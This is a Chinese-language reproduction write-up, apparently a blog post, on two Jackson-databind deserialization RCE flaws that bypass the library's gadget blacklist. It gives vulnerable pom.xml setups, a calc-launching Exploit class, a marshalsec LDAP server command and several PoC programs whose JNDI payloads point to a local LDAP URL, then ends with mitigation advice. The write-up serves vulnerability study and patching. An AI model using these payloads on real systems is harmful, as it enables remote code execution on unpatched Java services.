CVE-2020-xxxx:Jackson-databind RCE
字数 1146 2025-08-18 17:33:08
Jackson-databind RCE漏洞分析与复现
漏洞概述
本文分析两个Jackson-databind反序列化远程代码执行漏洞(CVE-2020-xxxx),这两个漏洞都绕过了Jackson-databind维护的黑名单类,在特定条件下可导致远程代码执行。
第一则漏洞分析
影响范围
- jackson-databind before 2.9.10.4
- jackson-databind before 2.8.11.6
- jackson-databind before 2.7.9.7
利用条件
- 开启
enableDefaultTyping() - 使用了
com.pastdev.httpcomponents.configuration.JndiConfiguration第三方依赖
漏洞原理
com.pastdev.httpcomponents.configuration.JndiConfiguration类绕过了之前Jackson-databind维护的黑名单类,当JDK版本较低时,可造成RCE。
环境搭建
pom.xml依赖配置:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.4</version>
</dependency>
<dependency>
<groupId>com.pastdev.httpcomponents</groupId>
<artifactId>configuration</artifactId>
<version>0.1.3</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
漏洞复现步骤
- 准备Exploit.java并编译:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
-
启动HTTP服务托管Exploit.class文件
-
使用marshalsec启动LDAP服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1099
- 执行POC代码:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"com.pastdev.httpcomponents.configuration.JndiConfiguration\",\"ldap://127.0.0.1:1099/Exploit\"]";
try {
mapper.readValue(payload, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
漏洞分析
利用链:
mapper.readValue
->JndiConfiguration
->lookup
相关issue: https://github.com/FasterXML/jackson-databind/issues/2798
第二则漏洞分析
影响范围
- jackson-databind before 2.9.10.4
- jackson-databind before 2.8.11.6
- jackson-databind before 2.7.9.7
利用条件
- 开启
enableDefaultTyping() - 使用了
br.com.anteros第三方依赖
漏洞原理
br.com.anteros.dbcp.AnterosDBCPConfig类绕过了之前Jackson-databind维护的黑名单类,当JDK版本较低时,可造成RCE。
环境搭建
pom.xml依赖配置:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.4</version>
</dependency>
<dependency>
<groupId>br.com.anteros</groupId>
<artifactId>Anteros-DBCP</artifactId>
<version>1.0.1</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
漏洞复现
-
准备Exploit.java(同上)
-
执行POC1:
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
public static void main(String[] args) throws Exception {
String payload = "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"healthCheckRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.readValue(payload, Object.class);
}
}
- 执行POC2:
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
public static void main(String[] args) throws Exception {
String payload = "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"metricRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.readValue(payload, Object.class);
}
}
漏洞分析
利用链:
mapper.readValue
->AnterosDBCPDataSource.setHealthCheckRegistry
->AnterosDBCPDataSource.setHealthCheckRegistry
->AnterosDBCPDataSource.getObjectOrPerformJndiLookup
->initCtx.lookup();
相关issue: https://github.com/FasterXML/jackson-databind/issues/2814
安全建议
- 及时将jackson-databind升级到安全版本
- 升级到较高版本的JDK(JDK 11.0.1、8u191、7u201、6u211之后)
- 避免不必要的
enableDefaultTyping()调用 - 严格控制反序列化数据来源